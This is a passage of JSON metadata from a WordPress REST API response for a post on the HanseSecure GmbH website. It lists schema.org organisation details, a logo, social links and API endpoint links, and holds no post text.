GmbH","url":"https:\/\/hansesecure.de\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/logo\/image\/","url":"https:\/\/hansesecure.de\/wp-content\/uploads\/2023\/05\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png","contentUrl":"https:\/\/hansesecure.de\/wp-content\/uploads\/2023\/05\/cropped-000-LOGO-intensiv-schwarz-rot-HanseSecure_LOGO_CTI_Vektor_rotes_H11806.png","width":512,"height":512,"caption":"HanseSecure GmbH"},"image":{"@id":"https:\/\/hansesecure.de\/en\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/hansesecure","https:\/\/x.com\/CyberWarship","https:\/\/www.linkedin.com\/company\/hansesecure","https:\/\/www.youtube.com\/channel\/UCAABbKOA_stDFkEKS3MSF7Q","https:\/\/www.instagram.com\/hansesecure\/"]},{"@type":"Person","@id":"https:\/\/hansesecure.de\/en\/#\/schema\/person\/6ec6ef4887ff2fc97a14f1a7f390f593","name":"HanseSecure","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/58fe26b2270315f2ab1268b229465b72c497c86aac3696aaaf2e629ae4e4f0af?s=96&d=mm&r=g","caption":"HanseSecure"}}]}},"_links":{"self":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\/7384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/comments?post=7384"}],"version-history":[{"count":1,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\
/7384\/revisions"}],"predecessor-version":[{"id":9320,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/posts\/7384\/revisions\/9320"}],"wp:attachment":[{"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/media?parent=7384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/categories?post=7384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hansesecure.de\/en\/wp-json\/wp\/v2\/tags?post=7384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}